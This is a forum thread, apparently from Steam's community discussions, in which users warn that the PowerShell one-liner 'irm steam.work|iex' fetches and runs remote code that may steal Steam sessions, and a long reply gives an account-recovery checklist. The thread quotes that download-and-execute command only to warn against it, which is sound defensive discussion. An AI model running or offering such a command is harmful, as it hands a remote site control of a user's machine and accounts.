You're running foreign code, potentially malware, that will possibly steal your account session token.

You exposed your login credentials:
a) Either by logging into a site that faked a Steam login and made a bot log into your account using the save password as well as the trust device feature while injecting a Steam API access into it.
>>> b) Or by installing malware that stole your session data or injected a keylogger. <<<
c) Or by using outdated login information that got exposed in a leak.
d) Or by falling for a Steam Support impersonation scam on Discord or similar platforms.

1. Scan for malware https://www.malwarebytes.com/
2. Check that the email and phone number on the Steam account are still yours.
3. Ensure your email address and/or password aren't contained in any public breaches. There are various sites that allow you to do that.
-- If they are contained in any public breaches, change your email account's password from a secure computer before proceeding.
-- If that happens, you may want to secure other accounts than just Steam.
-- Consider using mobile two-factor authentication on your e-mail address if your e-mail provider supports it.
4. Deauthorize all devices INCLUDING the one you are using (You will have to relog after you click it): Steam -> Settings -> Security -> Deauthorize All Devices or https://store.steampowered.com/twofactor/manage
5. Change passwords from a clean computer
6. Generate new backup codes for your Mobile App https://store.steampowered.com/twofactor/manage
7. Revoke the API key https://steamcommunity.com/dev/apikey (there should be nothing in the APIKEY)
8. Change your trade link: Profile > your inventory > trade offer > Who can send me trade offer > scroll down and make a new trade link.
9. If points were stolen within 14 days, reset your Steam password (not change, RESET using Forgot Password) to cancel pending awards.

Steam Support will not restore stolen items nor stolen wallet funds.
In accordance with Section 1 C of the Steam Subscriber Agreement, you are fully responsible for all actions on your account, no matter who used the account. This includes actions that occurred as the consequence of fraudulent account access by phishing or malware, be it input relay, session token theft or any other method that granted a third party access to your account.

---

If that command was part of a games sale, chargeback the money. You were scammed because you were sold a pirated copy, possibly with account theft to boot. Never buy Steam games on unauthorized third party sites.

see also: https://steamcommunity.com/discussions/forum/1/4147320315761349131/

Originally posted by 布冯:

hey ，What impact does running the “irm steam.work|iex” command in PowerShell have?

That command is super risky it's often used to run scripts from shady sources. It could steal your Steam credentials or install malware. If you ran it, change your passwords and scan your PC ASAP.

You open yourself up to malicious code at that site address. You're basically granting that site privileged rights on your PC. If I recall, this is often a requirement for certain pirated games to run.

I would not recommend executing that command.

You help the hacker to get your data and eventually your account.

I don't think he has run it, it's the way he ask for what can happend.